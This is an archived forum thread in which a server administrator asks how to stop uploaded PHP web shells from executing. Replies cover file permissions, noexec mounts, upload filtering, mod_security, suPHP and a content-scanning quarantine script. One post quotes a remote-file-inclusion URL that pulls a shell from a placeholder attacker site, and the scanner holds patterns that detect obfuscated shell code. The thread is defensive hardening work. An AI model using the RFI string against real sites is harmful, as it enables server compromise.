Solved

prevent shells

Posted on 2008-06-16
Last Modified: 2010-08-05
Hello,
I have a Linux server with cPanel and WHM on an Apache server.
I need a way, in a shell programming script, to prevent the execution of the most common PHP shell pages like r75 and ch99.


I need shell pages not to be executed even if they are uploaded,
depending not just on the file names but also on the file content.
I have copies of all the common shells in case the programmer needs to have a look at them to know what he is going to disable.


I know there are ways in mod_security, and I know Rootkit Hunter, but actually I am looking for a way, by programming a shell script, to prevent the execution of the most common PHP shell pages.

0
Comment
Question by:NT-lover
17 Comments
 
LVL 40

Expert Comment

by:omarfarid
How are the files uploaded?

You may revoke execute permission from those files.
0
 

Author Comment

by:NT-lover
Hi,

Actually I am looking for a solution in shell scripting for when hackers succeed in uploading to my server.
0
 

Author Comment

by:NT-lover
Gents,

This question is just for EXPERTS. I need shell pages not to be executed even if they are uploaded,

by finding a solution, also by shell script programming, that prevents PHP shell pages like r75 and ch99, depending not just on the file names but also on the file content.

Regards

 
0
 

Author Comment

by:NT-lover

Dear PenguinMod,

Thank you for your reply, but actually my question was very clear:

(I need a way, by shell programming, to prevent shell pages from being executed even if they are uploaded.)

And the comment of my dear omarfarid:

(You may revoke execute permission from those files.)

As you can see, I am not talking about permissions. My question was very clear: as I mentioned, I need a way to prevent shell pages from being EXECUTED EVEN IF THEY ARE UPLOADED, by (shell language), not by permissions or some way involving permissions, and I also mentioned EVEN IF THEY ARE UPLOADED.

So I am not disrespecting anyone here, and if my dear omarfarid sees my words as disrespectful to him, I apologize to him.

But I need expert people who can take the questions seriously and help me and help anyone who has the same question, so the matter is not related to disrespecting anyone. I just need experts, and for them to read the complete question before they post any comment or solution. So I am not disrespecting anyone here.

So this is my first question. If I am not welcome here and I cannot find help from experts here, then please tell dear PenguinMod to cancel my membership and cancel this question.

Thank you for your time and your support.

Regards

0
 
LVL 40

Expert Comment

by:omarfarid
Dear PenguinMod:

Thank you for monitoring the questions and comments made.

Dear NT-lover:

I would like to clarify something. As EE Experts, our goal is to help in answering questions posted.

When I read your question, it was not clear to me how the shell pages are uploaded, since hosting providers do allow their customers to upload their pages etc. The first thing that came to my mind was that, if this is the case, revoking the permissions of these pages might give you what you want.
0
 

Author Comment

by:NT-lover
Dear omarfarid,

First of all, thank you for your reply; I really appreciate your help as EE Experts.

Second point, dear omarfarid:

You should know there are many exploits by which any hacker can upload any PHP shell, such as the symlink function, RFI, XSS... and this is an example of RFI:

httX://yourSite/bad_code_file.php?action=_httX://attackerSite/phpShell.txt?

So here I am not talking about permissions; actually I am talking about:

How can I stop any PHP shell after it is uploaded to my server (and I am looking to find a solution in a shell scripting language)? I hope my question will be clear now.

Best Regards
0
 
LVL 12

Accepted Solution

by:
nexusnation earned 100 total points
NT-lover,

I am no expert,  but if you set the file modes/permissions using the Chmod UNIX/Linux command to something that does not allow execution, the file by definition cannot be executed. Provided you consider Chmod a "programming shell script," this will work perfectly to prevent the script from being able to execute.

http://en.wikipedia.org/wiki/Chmod
0

 

Author Comment

by:NT-lover
nexusnation,

A solution based on modes/permissions will not help me, because I have seen many tools that hackers use to break the permissions easily. Also, if I prevent PHP shells using an idea related to permissions, what about Perl shells, CGI shells, telnet shells? In addition, there are private exploits in PHP that can break the file permissions; my friend faced one 4 months ago.

So it will not help me, but really, thank you for your help; I really appreciate it.

Regards
0
 
LVL 12

Expert Comment

by:nexusnation
NT-lover,

If you're that unnecessarily paranoid about security, you're never going to agree to any solution provided, so there's not much more I can do to help.

File permissions are *not* PHP-based.  They are server-based (in this case Linux).  You can't simply break them using PHP, nor do you set them using php.  Chmod IS a shell command.  This is *exactly* what you're looking for; there's not much else.  After that, you're simply confusing terminology as well as technologies.

There are only two ways to prevent execution of code to your expectation of security:
 - Set appropriate file permissions on the server.
 - Don't upload it to begin with.

That's it.
0
 
LVL 16

Assisted Solution

by:Hanno Schröder
Hanno Schröder earned 100 total points
A file on a Unix system that does not have execute permissions cannot be executed -- that's what the execute permission is for.
This is fundamentally different to any kind of Windows OS as there is no
such mechanism known. Any file with matching extension in its bare name
(e.g. *.exe) can get executed right away.

The only way to "execute" files on a Unix-based system which don't have
the execute permission is by letting them get interpreted by some other
executable program. Most commonly, you use some shell (executable) to
interpret a shell script.

Assume you have the file /path-to/file/abc.sh which is not executable.
You cannot execute it with the command
  /path-to/file/abc.sh
But it can get interpreted by a shell with the command
  /usr/bin/my-shell  /path-to/file/abc.sh
0
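
What the answer above describes, as an added example in shell (not part of the original post): a constructed script without the execute bit is refused when run directly but still runs when handed to an interpreter, which is also how Apache's PHP module handles any .php file it can read. The function name and temporary paths are assumptions.

```sh
#!/bin/sh
# Added example: the execute bit blocks direct execution, not interpretation.
# Prints "direct=<status> interpreted=<status>:<output>" for a constructed script.
exec_bit_demo() {
    dir=$(mktemp -d) || return 1
    script="$dir/abc.sh"
    printf '#!/bin/sh\necho ran-anyway\n' > "$script"
    chmod 644 "$script"                 # readable, no execute bit for anyone

    # Direct execution: the kernel refuses, the calling shell reports 126.
    if "$script" >/dev/null 2>&1; then direct=0; else direct=$?; fi

    # Interpretation: sh only needs read access to the file.
    if output=$(sh "$script" 2>/dev/null); then interpreted=0; else interpreted=$?; fi

    rm -rf "$dir"
    echo "direct=$direct interpreted=$interpreted:$output"
}

if [ "${1:-}" = "--demo" ]; then
    exec_bit_demo
fi
```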
 
LVL 51

Assisted Solution

by:ahoffmann
ahoffmann earned 100 total points
> .. there are many exploits that can any hacker upload any php shell ..
How about simply disabling uploads?
Or do I miss something in the description?
0
 
LVL 19

Assisted Solution

by:Redimido
Redimido earned 100 total points
Hey, I like the comment from ahoffmann :-)

There are a lot of ways you can harden your system:

a) Upload your files to a partition that has the "noexec" parameter. It is simple: no program will be started from a mount point that has "noexec" turned on. That is usual for /tmp and /var/tmp.

b) Only allow PHP to execute a defined extension, like .php.
c) Restrict your upload script to NOT ACCEPT anything with the extension .php.
d) Run file scanners such as Rootkit Hunter.
e) You can write a crontab entry. Every minute it launches a find command for executables and changes them to not executable:
* * * * * /usr/bin/find /upload/directory -type f -perm /111 -exec /bin/chmod a-x {} \;

Also, files should not be owned by the same user your web server is running as, so they are not modifiable.

These are the first that come to my mind. YMMV
0
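
For the content-based check the question asks for, and the file-scanner and cron steps (d, e) in the answer above, an added example (not code from any poster): a sweep that quarantines any upload containing PHP code regardless of its file name. The directory layout, function names and the two heuristics are assumptions, and the sample files are constructed and inert.

```sh
#!/bin/sh
# Added example: content-based sweep of an upload directory.
# Heuristics are illustrative assumptions, not signatures of a specific shell.
PHP_TAG='<\?php'
OBFUSCATED='(eval|assert)[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|str_rot13)'
export PHP_TAG OBFUSCATED   # the child sh started by find reads these

# sweep UPLOAD_DIR QUARANTINE_DIR
# Prints "reason<TAB>original path<TAB>quarantine name" for every file moved.
# QUARANTINE_DIR must be outside UPLOAD_DIR and outside the web root.
sweep() {
    mkdir -p "$2" && chmod 700 "$2" || return 1
    # File names reach the child sh as arguments, never as code, so names
    # with spaces, quotes or newlines cannot break or bypass the loop.
    find "$1" -type f -exec sh -c '
        q=$1; shift
        for f do
            if   LC_ALL=C grep -Eaiq "$OBFUSCATED" "$f"; then r=obfuscated-eval
            elif LC_ALL=C grep -Eaiq "$PHP_TAG" "$f";    then r=php-in-upload
            else continue
            fi
            dest=$(mktemp "$q/XXXXXXXX") &&
                mv -f -- "$f" "$dest" &&
                chmod 000 "$dest" &&
                printf "%s\t%s\t%s\n" "$r" "$f" "${dest##*/}"
        done' sh "$2" {} +
}

# Constructed sample uploads; the PHP in them is inert.
make_samples() {
    mkdir -p "$1/img"
    printf 'JFIF constructed image bytes\n' > "$1/img/photo.jpg"
    printf 'plain text notes\n' > "$1/notes.txt"
    printf '<?php echo "constructed"; ?>\n' > "$1/img/avatar.jpg"
    printf '<?php eval(base64_decode("Y29uc3RydWN0ZWQ=")); ?>\n' > "$1/tool.txt"
}

if [ "${1:-}" = "--demo" ]; then
    d=$(mktemp -d) && make_samples "$d/uploads" && sweep "$d/uploads" "$d/quarantine"
fi
```

Run it from cron as a user other than the web server's, so the quarantined files stay unreadable to PHP. Short open tags (<?) are not covered by these two patterns.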
 
LVL 11

Assisted Solution

by:gothicbloody
gothicbloody earned 100 total points
Hi ,
Install mod_security with rules (web server firewall), and also try to install suPHP to run scripts under the same users, and also check folder permissions.
0
 
LVL 19

Expert Comment

by:Redimido
mod_security can be costly when the site has many hundreds of users. Other than that, it is a great way to secure your system.
0
 
LVL 19

Expert Comment

by:Redimido
I got an alert about this question being closed.

Before it is closed, I want to comment on a way PHP scripts can be stopped:

Use PHP as cgi-bin, not as a module for Apache.

Then disallow uploads to the cgi-bin directory (very easy if you simply set directory permissions).

That way, even if a PHP script can be uploaded to the system, it would not be executed unless such a script is in the cgi-bin directory, which is not writable.

That is exactly what was asked: how to prevent an uploaded PHP script from being executed.

NT-lover: can you reply back if this is your answer, pls?
0
